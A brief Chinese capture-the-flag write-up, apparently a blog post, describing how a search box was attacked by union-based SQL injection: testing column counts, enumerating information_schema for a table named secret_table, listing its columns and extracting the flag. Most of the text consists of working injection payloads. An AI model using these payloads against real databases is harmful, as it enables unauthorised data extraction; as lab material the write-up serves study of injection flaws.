题目有一个搜索框，下面是搜索结果，最先考虑是sql注入

遇到sql注入，一般先用单引号，1，2尝试。先尝试构造输入为：sd' union select 1,2 #和sd' union select 1,2 ,3# （第一个  ‘  闭合后台命令的第一个  ’    ，#注释掉后台的第二个  '    ）只有1，2，3时才正确返回，说明数据格式为3列。

 

 然后构造sd' union select 1,2,table_name from information_schema.tables#发现一个secret_table的数据库

然后sd' union select 1,2,column_name from information_schema.columns where table_name='secret_table'#

sd' union select 1,2,fl4g from secret_table#

 

参考链接：https://www.cnblogs.com/AnEKiller/p/11573847.html